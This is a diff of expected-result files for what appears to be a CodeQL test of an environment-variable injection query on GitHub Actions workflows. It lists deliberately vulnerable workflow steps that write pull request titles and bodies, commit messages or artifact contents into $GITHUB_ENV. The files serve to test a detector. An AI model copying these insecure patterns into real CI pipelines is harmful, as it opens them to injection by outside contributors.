@@ -72,6 +71,12 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> 
"$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -90,12 +95,18 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 82602ee8ed8..1ac092dd0d3 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | 
.github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | 
pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | 
.github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | 
